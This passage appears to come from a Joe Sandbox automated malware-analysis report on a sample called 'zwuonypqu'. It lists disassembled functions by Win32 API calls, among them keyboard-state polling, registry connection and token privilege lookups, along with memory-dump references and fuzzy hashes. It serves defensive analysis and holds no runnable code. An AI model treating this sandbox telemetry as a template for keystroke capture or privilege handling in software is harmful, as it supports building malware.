                        • GetAsyncKeyState.USER32 ref: 00453D3F
                        • GetKeyState.USER32(00000012), ref: 00453D4D
                        • GetAsyncKeyState.USER32 ref: 00453D77
                        • GetKeyState.USER32(0000005B), ref: 00453D85
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                        • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                        • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                        • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                        • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                        • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                        • GetDlgItem.USER32(?,00000002), ref: 00437E70
                        • GetWindowRect.USER32(00000000,?), ref: 00437E82
                        • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                        • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                        • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                        • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                        • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                        • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                        • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                        • String ID:
                        • API String ID: 136442275-0
                        • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                        • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                        • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                        • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                        APIs
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ConnectRegistry_wcslen
                        • String ID: HH
                        • API String ID: 535477410-2761332787
                        • Opcode ID: a539bec3942ca183e167a594436ad1d80a8c4c703c9632727b16f4de32fac591
                        • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                        • Opcode Fuzzy Hash: a539bec3942ca183e167a594436ad1d80a8c4c703c9632727b16f4de32fac591
                        • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                        APIs
                        • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                        • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                        • _wcslen.LIBCMT ref: 00460502
                        • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                        • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                        • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                        • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                        • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                        • GetWindowRect.USER32(?,?), ref: 004606AD
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                        • String ID: ThumbnailClass
                        • API String ID: 4123061591-1241985126
                        • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                        • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                        • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                        • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                        APIs
                          • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                          • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                          • Part of subcall function 00456354: GetAsyncKeyState.USER32 ref: 004563D0
                          • Part of subcall function 00456354: GetAsyncKeyState.USER32 ref: 004563DC
                        • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                        • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                        • ImageList_EndDrag.COMCTL32 ref: 0046F583
                        • ReleaseCapture.USER32 ref: 0046F589
                        • SetWindowTextW.USER32(?,00000000,?,?,00000000,00000000,?,00000000), ref: 0046F620
                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                        • API String ID: 2483343779-2060113733
                        • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                        • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                        • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                        • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                        APIs
                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                        • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                        • GetClientRect.USER32(?,?), ref: 0046FEF2
                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                        • DestroyIcon.USER32(?), ref: 0046FFCC
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                        • String ID: 2
                        • API String ID: 1331449709-450215437
                        • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                        • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                        • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                        • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: DestroyWindow
                        • String ID: static
                        • API String ID: 3375834691-2160076837
                        • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                        • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                        • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                        • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                        APIs
                        • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                        • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                        • _memcmp.LIBCMT ref: 004394A9
                        • CloseHandle.KERNEL32(?), ref: 004394F8
                        Strings
                        • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                        • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                        • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                        • API String ID: 1446985595-805462909
                        • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                        • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                        • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                        • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                        • API String ID: 2907320926-41864084
                        • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                        • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                        • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                        • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                        APIs
                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046735D
                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004673ED
                        • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00467559
                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?), ref: 004675E4
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                        • String ID:
                        • API String ID: 1932665248-0
                        • Opcode ID: 540ab9611df07496c965c6f5b012998b0ae5b601d672a50a0582804279fda95d
                        • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                        • Opcode Fuzzy Hash: 540ab9611df07496c965c6f5b012998b0ae5b601d672a50a0582804279fda95d
                        • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                        • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                        • _memset.LIBCMT ref: 004481BA
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                        • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow_memset
                        • String ID:
                        • API String ID: 830647256-0
                        • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                        • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                        • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                        • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                        APIs
                          • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                        • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                        • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                        • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                        • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                        • DeleteObject.GDI32(00000000), ref: 0046EB4F
                        • DestroyIcon.USER32(00000000), ref: 0046EB67
                        • DeleteObject.GDI32(0F0012BF), ref: 0046EB7F
                        • DestroyWindow.USER32 ref: 0046EB97
                        • DestroyIcon.USER32(?), ref: 0046EBBF
                        • DestroyIcon.USER32(?), ref: 0046EBCD
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                        • String ID:
                        • API String ID: 802431696-0
                        • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                        • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                        • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                        • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                        APIs
                        • GetKeyboardState.USER32(?), ref: 00444D8A
                        • GetAsyncKeyState.USER32 ref: 00444E0F
                        • GetKeyState.USER32(000000A0), ref: 00444E26
                        • GetAsyncKeyState.USER32 ref: 00444E40
                        • GetKeyState.USER32(000000A1), ref: 00444E51
                        • GetAsyncKeyState.USER32 ref: 00444E69
                        • GetKeyState.USER32(00000011), ref: 00444E77
                        • GetAsyncKeyState.USER32 ref: 00444E8F
                        • GetKeyState.USER32(00000012), ref: 00444E9D
                        • GetAsyncKeyState.USER32 ref: 00444EB5
                        • GetKeyState.USER32(0000005B), ref: 00444EC3
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                        • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                        • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                        • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID: HH
                        • API String ID: 0-2761332787
                        • Opcode ID: eeb0280e5febe64723c105f8911bb61e8e90965a8667be399f5b576390a001f5
                        • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                        • Opcode Fuzzy Hash: eeb0280e5febe64723c105f8911bb61e8e90965a8667be399f5b576390a001f5
                        • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004508FC
                        • _wcslen.LIBCMT ref: 00450944
                        • _wcscat.LIBCMT ref: 00450955
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
